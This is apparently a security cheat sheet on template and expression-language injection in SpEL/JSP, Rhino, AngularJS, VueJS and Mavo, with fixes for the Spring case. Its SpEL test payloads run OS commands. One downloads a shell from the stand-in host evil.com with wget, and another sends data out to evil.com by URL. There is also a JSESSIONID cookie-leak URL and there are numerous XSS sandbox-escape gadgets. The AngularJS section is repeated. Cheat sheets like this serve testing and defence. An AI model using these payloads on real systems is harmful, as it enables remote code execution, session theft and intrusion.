Skip to content

Template Injection

Expression Language/Template Injection

Used in JSP2.0/2.1, Jakarta, OGNL, MVEL, SPEL

Example:

<c:out value="person.address.street"/>

Spring Expression Language (SpEL)

Echo Foo Parameter:

<spring:message scope="${param.foo}"/>

Testing:

${“aaaa”}
${"aaaa"}
${99999+1}
T(java.lang.Runtime).getRuntime().exec("wget http://evil.com/shell.jsp")
(new java.util.Scanner((T(java.lang.Runtime).getRuntime().exec("uname -a").getInputStream()),"UTF-8")).useDelimiter("\\A").next()
new java.net.URL("http://evil.com/ex?data="+??).openConnection().getInputStream().readLine()

Data Leakage:

${applicationScope}
${requestScope} 
http:///vulnerable.com/spring/foo?param=${cookie["JSESSIONID"].value}

Example Vulnerable Code

ExpressionParser parser = new SpelExpressionParser();
 
StandardEvaluationContext testContext = new StandardEvaluationContext(TEST_PERSON);
Expression exp = parser.parseExpression(dynamicValue); // name = 'Bob'
String valueExtracted = exp.getValue(testContext, String.class);

How to fix

Per page Fix:

<%@ page isELIgnored ="true" %>

Per App Fix:

<context-param>
     <description>Spring Expression Language Support</description>
     <param-name>springJspExpressionSupport</param-name>
     <param-value>false</param-value>
</context-param>

ScriptEngine / Rhino

Testing:

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()

Example Vulnerable Code

Example1:

import org.mozilla.javascript.*;
 
Context cx = Context.enter();
[...]
cx.evaluateString(scope, dynamicCodeHere, "", 1, null);

Example1:

import javax.script.ScriptEngine;
 
ScriptEngineManager scriptEngineManager = new ScriptEngineManager();
ScriptEngine scriptEngine = scriptEngineManager.getEngineByExtension("js");
 
Object result = scriptEngine.eval(dynamiceCodeHere);

Jinja

https://portswigger.net/research/server-side-template-injection

AngularJS

Examples:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

AngularJS

Examples:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

VueJS

https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

Examples:

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

V3 Examples:

{{_openBlock.constructor('alert(1)')()}}

V2 Examples:

{{constructor.constructor('alert(1)')()}}

Mavo

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]